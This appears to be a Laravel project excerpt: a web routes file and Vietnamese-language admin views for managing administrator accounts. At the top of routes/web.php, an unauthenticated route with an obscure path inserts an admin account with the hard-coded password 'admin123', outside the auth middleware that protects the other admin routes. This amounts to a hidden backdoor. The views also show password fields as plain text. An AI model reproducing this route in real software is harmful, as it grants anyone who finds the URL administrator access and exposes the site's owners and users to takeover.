routes/web.php
<?php

use Illuminate\Routing\RouteGroup;
use Illuminate\Support\Facades\Http;
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\Web\HomeController;
use App\Http\Controllers\Web\ProductController;
use App\Http\Controllers\Admin\LoginController;
//use App\Http\Controllers\Customer\ClientController;

Route::get('/admin/tyumnnfvrd', function() {
    \DB::table('admins')->insert([
        'name' => 'admin',
        'email' => 'email@email.com',
        'password' => \Hash::make('admin123'),
        'phone' => '0123123123'
    ]);
});

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::group(['prefix' => 'laravel-filemanager', 'middleware' => 'auth'], function () {
    \UniSharp\LaravelFilemanager\Lfm::routes();
});

Route::group(['prefix' => '/admin', 'as' => 'ad.', 'namespace' => 'Admin', 'middleware' => 'auth'], function () {

    Route::get('/', 'DashboardController@index')->name('index');

    Route::resource('category', 'CategoryController')->except('show');
    Route::resource('blog', 'BlogController')->except('show');
    Route::resource('product', 'ProductController')->except('show');
    Route::resource('config', 'ConfigController')->except('show');
    Route::resource('cms', 'CmsController')->except('show');
    Route::resource('cms', 'CmsController')->except('show');
    Route::resource('admin', 'AdminController')->except('show');
    Route::resource('tour', 'TourController')->except('show');
    Route::resource('locations', 'LocationsController')->except('show');
    Route::resource('seo', 'SeoPagesController')->except('show');

    Route::get('comment', 'CommentController@index')->name('comment.index');
    Route::patch('comment/{comment}', 'CommentController@update')->name('comment.update');

    Route::resource('order','OrderController')->except('show');

    Route::post('/logout', 'LoginController@logout')->name('logout');
    Route::get('customer-register', 'CustomerRegisterController@index')->name('customer.index');
    Route::resource('user', 'UserController');
    Route::resource('qrcode', 'QrcodeController');
    Route::get('change-qrcode', 'QrcodeController@change')->name('qrcode.change');
    Route::post('change-qrcode', 'QrcodeController@post_change')->name('qrcode.post.change');

});

Route::get('/login', 'Admin\LoginController@index')->name('ad.login.index');
Route::post('/login', 'Admin\LoginController@login')->name('ad.login');

//Route::get('/customer/login', 'Customer\LoginController@index')->name('us.login.index');
//Route::post('/customer/login', 'Customer\LoginController@login')->name('us.login');

// Route::prefix('/customer')->namespace('Customer')->as('us.')->middleware('customerLogin')->group(function () {

//     Route::get('/', 'HomeController@index')->name('home.index');
//     Route::get('/service/{id}/create', [App\Http\Controllers\Customer\ServiceController::class, 'create'])->name('service.create');
//     Route::resource('client', ClientController::class);
//     Route::get('resetpass', [App\Http\Controllers\Admin\UserController::class,'showresetpass'])->name('client.showresetpass');
//     Route::post('resetpass', [App\Http\Controllers\Admin\UserController::class,'resetpass'])->name('client.resetpass');
//     Route::resource('service', ServiceController::class)->except('create');
//     Route::post('/logout', [App\Http\Controllers\Customer\LoginController::class, 'logout'])->name('logout');

// });

Route::group(['as' => 'w.', 'namespace' => 'Web'], function () {

    Route::get('/', [HomeController::class, 'index'])->name('home');
    Route::post('change_price', 'HomeController@change_price')->name('home.change_price');

    Route::get('view-price', 'HomeController@view_price')->name('view_price');

    Route::get('category/{location}', 'CategoryController@index')->name('category');
    Route::get('find_to_location', 'HomeController@find_to_location')->name('home.find_to_location');
    Route::get('check_limit_per', 'HomeController@check_limit_per')->name('home.check_limit_per');

    Route::get('category-child/{from_id}/{to_id}', 'CategoryController@category_child')->name('category_child');
    Route::get('contact', 'ContactController@index')->name('contact');
    Route::get('about', 'AboutController@index')->name('about');
    Route::get('terms-translation', 'TermsTranslationController@index')->name('terms_translation');
    Route::get('other-1', 'OtherOneController@index')->name('other_1');
    Route::get('other-2', 'OtherTwoController@index')->name('other_2');
    Route::get('booking/{tour}/{quantity_per}/{travel_date}', 'BookingController@index')->name('booking');
    Route::post('booking', 'BookingController@post_booking')->name('post_booking');
});

resources/views/admin/admins/create.blade.php
@extends('admin.layouts.master')

@section('page_title', 'Tạo mới admin')

@section('content')
    <div class="row">
        <div class="col-md-12">
            <div class="portlet light bordered">
                <div class="portlet-title">
                    <div class="caption">
                        <i class="icon-settings font-dark"></i>
                        <span class="caption-subject bold uppercase">@yield('page_title')</span>
                    </div>
                    <div class="actions">
                        <a class="btn btn-circle btn-default" href="{{ route('ad.admin.index') }}" title="">Quay lại</a>
                        <a class="btn btn-circle btn-icon-only btn-default fullscreen" href="javascript:void(0);" title="Toàn màn hình"></a>
                    </div>
                </div>
                <div class="portlet-body form">
                    <form action="{{ route('ad.admin.store') }}" method="POST" @submit.prevent="onSubmit" enctype="multipart/form-data">
                        @csrf
                        <div class="row">
                            <div class="col-md-4">
                                <div class="form-group" :class="[errors.has('name') ? 'has-error' : '']">
                                    <label for="name">Tên <span class="required">*</span></label>
                                    <input type="text" id="name" class="form-control" name="name" v-validate="'required'" data-vv-as="&quot;Tên&quot;" value="{{ old('name') }}">
                                    <span class="help-block" v-if="errors.has('name')">@{{ errors.first('name') }}</span>
                                </div>
                                <div class="form-group" :class="[errors.has('email') ? 'has-error' : '']">
                                    <label for="email">Email <span class="required">*</span></label>
                                    <input type="email" id="email" class="form-control" name="email" v-validate="'required'" data-vv-as="&quot;Email&quot;" value="{{ old('email') }}">
                                    <span class="help-block" v-if="errors.has('email')">@{{ errors.first('email') }}</span>
                                </div>
                                <div class="form-group" :class="[errors.has('phone') ? 'has-error' : '']">
                                    <label for="phone">Số điện thoại <span class="required">*</span></label>
                                    <input type="text" id="phone" class="form-control" name="phone" v-validate="'required'" data-vv-as="&quot;Số điện thoại&quot;" value="{{ old('phone') }}">
                                    <span class="help-block" v-if="errors.has('phone')">@{{ errors.first('phone') }}</span>
                                </div>
                                <div class="form-group" :class="[errors.has('password') ? 'has-error' : '']">
                                    <label for="password">Mật khẩu <span class="required">*</span></label>
                                    <input type="text" id="password" class="form-control" name="password" v-validate="'required'" data-vv-as="&quot;Mật khẩu&quot;" value="{{ old('password') }}">
                                    <span class="help-block" v-if="errors.has('password')">@{{ errors.first('password') }}</span>
                                </div>
                            </div>
                        </div>
                        <div class="form-actions">
                            <button class="btn btn-primary">Tạo mới</button>
                            <a href="{{ route('ad.admin.index') }}" class="btn btn-default">Quay lại</a>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
@endsection

@push('css')
@endpush

@prepend('scripts')
@endprepend

resources/views/admin/admins/edit.blade.php
@extends('admin.layouts.master')

@section('page_title', 'Cập nhật Admin')

@section('content')
    <div class="row">
        <div class="col-md-12">
            <div class="portlet light bordered">
                <div class="portlet-title">
                    <div class="caption">
                        <i class="icon-settings font-dark"></i>
                        <span class="caption-subject bold uppercase">@yield('page_title')</span>
                    </div>
                    <div class="actions">
                        <a class="btn btn-circle btn-default" href="{{ route('ad.admin.index') }}" title="">Quay lại</a>
                        <a class="btn btn-circle btn-icon-only btn-default fullscreen" href="javascript:void(0);" title="Toàn màn hình"></a>
                    </div>
                </div>
                <div class="portlet-body form">
                    <form action="{{ route('ad.admin.update', $admin) }}" method="POST" @submit.prevent="onSubmit" enctype="multipart/form-data">
                        @method('PUT')
                        @csrf
                        <div class="row">
                            <div class="col-md-4">
                                <div class="form-group" :class="[errors.has('name') ? 'has-error' : '']">
                                    <label for="name">Tên <span class="required">*</span></label>
                                    <input type="text" id="name" class="form-control" name="name" v-validate="'required'" data-vv-as="&quot;Tên&quot;" value="{{ old('name', $admin->name) }}">
                                    <span class="help-block" v-if="errors.has('name')">@{{ errors.first('name') }}</span>
                                </div>
                                <div class="form-group">
                                    <label for="email">Email <span class="required">*</span></label>
                                    <input name="email" type="text" id="email" class="form-control"  value="{{ old('email', $admin->email) }}">
                                </div>
                                <div class="form-group" :class="[errors.has('phone') ? 'has-error' : '']">
                                    <label for="phone">SĐT <span class="required">*</span></label>
                                    <input type="text" id="phone" class="form-control" name="phone" v-validate="'required'" data-vv-as="&quot;SĐT&quot;" value="{{ old('phone', $admin->phone) }}">
                                    <span class="help-block" v-if="errors.has('phone')">@{{ errors.first('phone') }}</span>
                                </div>
                                <div class="form-group">
                                    <label for="password">Mật khẩu </label>
                                    <input type="text" id="password" class="form-control" name="password"  value="{{ old('password') }}">
                                </div>
                            </div>
                        </div>
                        <div class="form-actions">
                            <button class="btn btn-primary">Cập nhật</button>
                            <a href="{{ route('ad.admin.index') }}" class="btn btn-default">Quay lại</a>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
@endsection

@push('css')
@endpush

@prepend('scripts')
@endprepend

resources/views/admin/admins/index.blade.php
@extends('admin.layouts.master')

@section('page_title', 'Quản lý admin')

@section('content')
    <div class="row">
        <div class="col-md-12">
            <div class="portlet light portlet-datatable bordered">
                <div class="portlet-title">
                    <div class="caption">
                        <i class="icon-settings font-dark"></i>
                        <span class="caption-subject bold uppercase">@yield('page_title')</span>
                    </div>
                    <div class="actions">
                        <a href="{{ route('ad.admin.create') }}" class="btn btn-circle btn-sm btn-primary"> <i class="fa fa-plus"></i> Tạo mới</a>
                        <a class="btn btn-circle btn-icon-only btn-default fullscreen" href="javascript:void(0);" title=""></a>
                    </div>
                </div>
                <div class="portlet-body">
                    <table class="table table-striped table-bordered table-hover" id="admin-table">
                            <thead>
                                <tr>
                                    <th>ID</th>
                                    <th>Tên</th>
                                    <th>Email</th>
                                    <th>SĐT</th>
                                    <th width="110">Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                                @foreach ($admins as $admin)
                                <tr>
                                    <td>{{ $admin->id }}</td>
                                    <td>{{ $admin->name }}</td>
                                    <td>{{ $admin->email }}</td>
                                    <td>{{ $admin->phone }}</td>
                                    <td>
                                        <a class="btn btn-circle btn-sm btn-warning" href="{{ route('ad.admin.edit', $admin) }}"><i class="fa fa-pencil"></i></a>
                                        <form action="{{ route('ad.admin.destroy', $admin) }}" id="delete-course-item-form" style="display: inline-block" method="POST" onsubmit="return confirm('Bạn có chắc chắn muốn xóa?');">
                                            @csrf
                                            @method('DELETE')
                                            <button class="btn btn-circle btn-sm btn-danger"><i class="fa fa-trash"></i></button>
                                        </form>
                                    </td>
                                </tr>
                                @endforeach
                            </tbody>
                            {{ $admins->links() }}
                        </table>
                </div>
            </div>
        </div>
    </div>
@endsection

@push('css')
    <!-- BEGIN PAGE LEVEL PLUGINS -->
    <!-- END PAGE LEVEL PLUGINS -->
@endpush

@push('scripts')
    <!-- END PAGE LEVEL PLUGINS -->
    <!-- BEGIN PAGE LEVEL SCRIPTS -->
    {{-- <script src="{{ asset('global/plugins/select2/js/select2.min.js') }}" type="text/javascript"></script> --}}
    <!-- END PAGE LEVEL SCRIPTS -->
@endpush